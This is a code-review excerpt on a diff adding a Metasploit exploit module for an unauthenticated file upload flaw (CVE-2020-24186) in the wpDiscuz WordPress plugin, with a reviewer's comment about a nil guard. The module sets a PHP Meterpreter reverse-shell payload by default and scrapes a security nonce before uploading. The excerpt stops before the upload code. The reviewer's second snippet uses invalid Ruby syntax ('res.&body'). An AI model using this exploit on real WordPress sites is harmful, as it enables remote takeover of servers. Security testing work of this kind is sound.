modules/exploits/unix/webapp/wp_wpdiscuz_unauthenticated_file_upload.rb

```diff
@@ -0,0 +1,119 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HTTP::Wordpress
+  include Msf::Exploit::FileDropper
+  prepend Msf::Exploit::Remote::AutoCheck
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'WordPress wpDiscuz Unauthenticated File Upload Vulnerability',
+        'Description' => %q{
+          This module exploits an arbitrary file upload in the WordPress wpDiscuz plugin
+          versions >= `7.0.0` and <= `7.0.4`. This flaw gave unauthenticated attackers the ability
+          to upload arbitrary files, including PHP files, and achieve remote code execution on a
+          vulnerable site’s server.
+        },
+        'Author' =>
+            [
+              'Chloe Chamberland', # Vulnerability Discovery, initial msf module
+              'Hoa Nguyen - SunCSR'  # Metasploit Module enhancement
+            ],
+        'License' => MSF_LICENSE,
+        'References' =>
+            [
+              ['CVE', '2020-24186'],
+              ['WPVDB', '10333'],
+              ['URL', 'https://www.wordfence.com/blog/2020/07/critical-arbitrary-file-upload-vulnerability-patched-in-wpdiscuz-plugin/'],
+              ['URL', 'https://github.com/suncsr/wpDiscuz_unauthenticated_arbitrary_file_upload/blob/main/README.md'],
+              ['URL', 'https://plugins.trac.wordpress.org/changeset/2345429/wpdiscuz']
+            ],
+        'Privileged' => false,
+        'Platform' => 'php',
+        'Arch' => ARCH_PHP,
+        'Targets' => [['wpDiscuz < 7.0.5', {}]],
+        'DisclosureDate' => '2020-02-21',
+        'DefaultOptions' =>
+          {
+            'PAYLOAD' => 'php/meterpreter/reverse_tcp'
+          },
+        'DefaultTarget' => 0,
+        'Notes' =>
+          {
+            'Stability' => [CRASH_SAFE],
+            'Reliability' => [REPEATABLE_SESSION],
+            'SideEffects' => [ARTIFACTS_ON_DISK]
+          }
+      )
+      )
+
+    register_options [
+      OptString.new('BLOGPATH', [true, 'Link to the post [/index.php/2020/12/12/post1]', nil]),
+    ]
+  end
+
+  def check
+    check_plugin_version_from_readme('wpdiscuz', '7.0.5', '7.0.0')
+  end
+
+  def blogpath
+    datastore['BLOGPATH']
+  end
+
+  def find_wmusecurity_id
+    res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path, blogpath) })
+    wmusecurity_id = res.body.match(/wmuSecurity":"(\w+)/)&.captures
```

Comment:
This still needs a guard
```suggestion
    wmusecurity_id = res.body.match(/wmuSecurity":"(\w+)/)&.captures if res
```
or to use the safe navigation operator when attempting to access `.body` encase `res` is `nil`.
```
wmusecurity_id = res.&body.match(/wmuSecurity":"(\w+)/)&.captures
```